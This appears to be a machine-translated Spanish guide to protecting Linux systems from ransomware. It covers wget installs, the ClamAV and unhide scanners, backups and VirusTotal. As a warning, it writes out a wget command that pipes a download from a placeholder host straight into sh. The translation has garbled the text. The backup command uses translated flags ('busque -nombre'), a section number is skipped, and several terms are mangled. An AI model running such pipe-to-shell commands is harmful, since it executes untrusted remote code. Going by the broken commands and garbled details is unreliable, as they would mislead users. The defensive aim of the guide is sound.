El ransomware es uno de los problemas más amenazadores en el mundo de la seguridad de redes en la actualidad. Es aterrador pensar que alguien podría retener sus datos como rehenes. Algunas infecciones de ransomware cifran todos los datos en una cierta cantidad, y las personas que están detrás requieren una cierta cantidad de dinero antes de aceptar liberar la clave necesaria para desbloquear esos datos. Es una gran preocupación para las personas que han invertido mucho dinero en sus datos. Sin embargo, hay algunas buenas noticias para los usuarios de Linux.
En la mayoría de los casos, resulta difícil para el código ransomware tomar el control de algo más que el directorio de inicio de un solo usuario. Estos programas no tienen los permisos necesarios para eliminar una instalación completa. Esta es la razón por la que el ransomware Linux tiene más problemas en los servidores donde los operadores siempre tienen acceso de root. El ransomware no debería ser una preocupación importante para los usuarios de Linux, y hay algunos pasos a seguir para evitar que le suceda.
Método 1: Protección contra ataques al estilo BashCrypt
BasyCrypt es una prueba del concepto de ransomware que ha demostrado que las estructuras del servidor pueden infectarse con este tipo de código malicioso. Esto proporciona una línea de base para el aspecto que tendrían los paquetes de ransomware de Linux. Aunque actualmente es poco común, los mismos tipos de medidas preventivas sensatas también funcionan aquí para otros administradores de servidores de plataforma. El problema es que un gran número de personas puede estar utilizando un sistema host en entornos de nivel empresarial.
Si está ejecutando un servidor de correo electrónico, puede ser muy difícil evitar que la gente haga tonterías. Haga todo lo posible para recordarles a todos que no abran archivos adjuntos de los que no estén seguros y siempre escanee todo lo que sea malware. Otra cosa que realmente puede ayudar a prevenir este tipo de ataques es observar cómo instala los binarios con wget. Por supuesto, su servidor de correo probablemente no tenga un entorno de escritorio completo y probablemente use wget, apt-get, yum o pacman para administrar los paquetes entrantes. Es muy importante mirar los repositorios usados en estas instalaciones. A veces verá una orden que requiere que ejecute algo como wget http: //www.thisisaprettybadcoderepo.webs/ -O- | sh, o puede estar dentro de un script de shell. Por supuesto, no lo ejecute a menos que sepa para qué sirve esa tienda.
Método 2: instalar el paquete del escáner
Hay varias piezas de tecnología de escaneo de malware de código abierto. ClamAV es, con mucho, el más famoso, y puede instalarlo en muchas distribuciones basadas en apt usando:
sudo apt-get install clamav
Una vez instalado, un usuario de Clamav debe explicar el uso en un lenguaje sencillo. Tenga en cuenta que, si bien puede escanear y eliminar archivos infectados, no puede eliminar el código infeccioso de un archivo. Este es un caso de todo o nada.
Hay un segundo escáner con el que puede que no estés familiarizado, pero es útil si lo que te asusta son los procesos ocultos. Nuevamente, si está utilizando una distribución basada en apt, ejecute este comando para instalar el escáner void:
sudo apt-get install unhide
Una vez instalado, escriba:
sudo unhide sys
Esto realizará un análisis completo de su sistema en busca de procesos ocultos.
Método 4: Mantenga copias de seguridad limpias a mano
Si bien esto no debería ser un problema, incluso si todos deben hacer siempre copias de seguridad, las buenas copias de seguridad de ransomware se pueden eliminar de inmediato. Los archivos con extensiones que son específicas de las plataformas de desarrollo web, los pocos ransomware en la plataforma Linux, suelen ser atacados. Esto significa que si hay una tonelada de código .php, .xml o .js por ahí, querrá hacer una copia de seguridad de esto específicamente. Considere la siguiente línea de código:
tar -cf backups.tar $ (busque -nombre “* .ruby” -o-nombre “* .html”)
Esto debería crear un archivo de archivo de cinta grande de cada archivo con las extensiones .ruby y .html dentro de una estructura de archivo. A continuación, se puede mover a un subdirectorio temporal diferente para su extracción y garantizar que la creación funcionó correctamente.
Este archivo de cinta puede y debe transferirse a un volumen externo. Por supuesto, puede utilizar la compresión .bz2, .gz o .xv antes de hacerlo. Es posible que desee crear copias de seguridad duplicadas copiándolas en dos volúmenes diferentes.
Método 5: uso de escáneres basados en web
Es posible que haya descargado un paquete RPM o DEB de un sitio que tiene algún software útil. El software se distribuye a través de archivos tar comprimidos 7z o también. Los usuarios de dispositivos móviles también pueden obtener paquetes de Android en formato APK. Estos son fáciles de escanear con una herramienta en su navegador. Informe a https://www.virustotal.com/, y tan pronto como se cargue la página, presione el botón «Seleccionar archivo». Antes de cargar, tenga en cuenta que este es un servidor público. Aunque es seguro y lo ejecuta Alphabet Inc., transfiere archivos públicamente, lo que puede ser un problema en algunos entornos muy seguros. También está limitado a archivos de 128 MB.
Seleccione su archivo en el cuadro que aparece y seleccione abrir. El nombre del archivo aparecerá en la línea junto al botón después del cuadro de salida.
Haga clic en el gran azul «Scan it!» botón. Verá otro cuadro que indica que el sistema está cargando su archivo.
Si alguien ya ha verificado el archivo con anticipación, le notificará el informe anterior. Reconoce esto basándose en la suma de SHA256, que funciona de la misma manera que las mismas herramientas de línea de comandos de Linux a las que está acostumbrado. De lo contrario, ejecute un análisis completo con 53 programas de análisis diferentes. Algunos de ellos pueden tener tiempo libre cuando se ejecuta el archivo, y estos resultados se pueden ignorar con seguridad.
Algunos programas pueden tener resultados diferentes a otros, por lo que es fácil lograr falsos positivos con este sistema. La mejor parte es que funciona entre diferentes plataformas, lo que lo hace tan atractivo sin importar la distribución que tengas en los diferentes dispositivos. Funciona tan bien desde distribuciones móviles como Android, por lo que nuevamente es una excelente manera de explorar paquetes de APK antes de usarlos.